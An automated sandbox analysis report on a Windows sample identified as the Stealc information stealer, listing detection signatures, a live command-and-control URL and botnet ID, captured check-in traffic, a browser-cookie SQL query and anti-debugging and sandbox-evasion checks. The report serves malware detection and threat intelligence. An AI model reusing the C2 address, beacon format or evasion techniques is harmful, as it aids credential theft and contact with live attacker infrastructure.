
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1528463
MD5: c6761f44bbab998af58149acb8f7a920
SHA1: b37887456c6ebb6619f8c120bc6d7fd31f80ad27
SHA256: b1ac855c1055c03377a9b3b00f2d967f0bd6f6066a9215df60e951bd45741c8f
Tags: exeuser-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2324 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C6761F44BBAB998AF58149ACB8F7A920)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches: PCAP
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Yara matches: memory dumps
Source | Rule | Description | Author | Strings
00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2152337269.0000000005100000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 2324 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 2324 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Yara matches: unpacked PEs
Source | Rule | Description | Author | Strings
0.2.file.exe.ba0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T23:23:07.566582+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.ba0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_00BAC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00BA9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00BA7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA9B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00BA9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00BB8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00BB38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00BB4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00BADA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00BAE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00BAED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00BB4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00BAF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00BB3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00BA16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00BADE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00BABE70

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFID
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 33 46 30 35 37 30 31 36 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 2d 2d 0d 0a
    Data Ascii:
    ------IDBAFHDGDGHDGCBFCFID
    Content-Disposition: form-data; name="hwid"

    EE3F0570167F2148772887
    ------IDBAFHDGDGHDGCBFCFID
    Content-Disposition: form-data; name="build"

    doma
    ------IDBAFHDGDGHDGCBFCFID--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00BA4880
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFID
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 33 46 30 35 37 30 31 36 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 2d 2d 0d 0a
    Data Ascii:
    ------IDBAFHDGDGHDGCBFCFID
    Content-Disposition: form-data; name="hwid"

    EE3F0570167F2148772887
    ------IDBAFHDGDGHDGCBFCFID
    Content-Disposition: form-data; name="build"

    doma
    ------IDBAFHDGDGHDGCBFCFID--
Source: file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2194021053.000000000144D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2194021053.000000000144D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/?
Source: file.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2194021053.0000000001459000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2194021053.000000000144D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.2194021053.0000000001459000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpX
Source: file.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
Source: file.exe, 00000000.00000002.2194021053.000000000146C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
Source: file.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
Source: file.exe, 00000000.00000002.2194021053.000000000144D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37W

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F788C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0101099F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4104B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8126E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7123A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7F21C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F753C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7A312
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6F46A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF5410
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E21D60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F76D70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010334AB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7BD3F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F71E83
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EBA62E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E82FE9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D7A1
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00BA45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: nwkcdrfe ZLIB complexity 0.9947724143783947
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe, 00000000.00000003.2152337269.0000000005100000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00BB8680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00BB3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\33E6X32C.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1853440 > 1048576
Source: file.exe | Static PE information: Raw size of nwkcdrfe is bigger than: 0x100000 < 0x19e400

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.ba0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nwkcdrfe:EW;wlorzjea:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nwkcdrfe:EW;wlorzjea:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00BB9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cdf45 should be: 0x1c81df
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: nwkcdrfe
Source: file.exe | Static PE information: section name: wlorzjea
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push ebp; mov dword ptr [esp], ecx 0_2_00F828FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 4CBBF4B0h; mov dword ptr [esp], ecx 0_2_00F8290E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 790CB9B4h; mov dword ptr [esp], ebx 0_2_00F8297F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push ecx; mov dword ptr [esp], 49A4D848h 0_2_00F829FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push ebp; mov dword ptr [esp], edx 0_2_00F82A38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push ebp; mov dword ptr [esp], edi 0_2_00F82AB6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push esi; mov dword ptr [esp], edx 0_2_00F82AC3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push ecx; mov dword ptr [esp], edi 0_2_00F82AD8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push ebp; mov dword ptr [esp], 7DFEAC2Dh 0_2_00F82AE7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 0F061733h; mov dword ptr [esp], eax 0_2_00F82B9F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push ecx; mov dword ptr [esp], 7BFB4E00h 0_2_00F82BA5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 33600D4Fh; mov dword ptr [esp], ebx 0_2_00F82C3B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 0F6AA278h; mov dword ptr [esp], ecx 0_2_00F82C43
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 074A0F9Ah; mov dword ptr [esp], ebx 0_2_00F82CE6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push eax; mov dword ptr [esp], ebx 0_2_00F82DF0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 2845F994h; mov dword ptr [esp], ebp 0_2_00F82E4A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push eax; mov dword ptr [esp], edx 0_2_00F82E69
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 50A7F780h; mov dword ptr [esp], ecx 0_2_00F82E76
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 3B6C4443h; mov dword ptr [esp], ebp 0_2_00F82E7E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 6D999692h; mov dword ptr [esp], eax 0_2_00F82EF0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push ecx; mov dword ptr [esp], 025019B6h 0_2_00F82F09
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push ebx; mov dword ptr [esp], 73EF6C2Bh 0_2_00F82F19
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push esi; mov dword ptr [esp], 00000063h 0_2_00F82FA6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 45796C37h; mov dword ptr [esp], edi 0_2_00F83022
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push ebx; mov dword ptr [esp], esp 0_2_00F8303B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push eax; mov dword ptr [esp], ecx 0_2_00F8306C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push ebp; mov dword ptr [esp], 4BD10ABCh 0_2_00F830DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 4EA060AAh; mov dword ptr [esp], eax 0_2_00F830F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 4EC05736h; mov dword ptr [esp], ecx 0_2_00F83121
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 5A96A954h; mov dword ptr [esp], eax 0_2_00F8312C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F828F2 push 75569B6Ch; mov dword ptr [esp], eax 0_2_00F8317B
Source: file.exe | Static PE information: section name: nwkcdrfe entropy: 7.953317466464678

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00BB9860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13653
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F877CE second address: F877D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F866C4 second address: F866E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF449h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F869AA second address: F869B4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5AD8CCD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F86C8E second address: F86C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F86C93 second address: F86C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F86E3D second address: F86E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F86E41 second address: F86E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5AD8CCD671h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F86E61 second address: F86E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F86E67 second address: F86E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F86E71 second address: F86E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F896CE second address: F896D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5AD8CCD666h 0x0000000a rdtsc
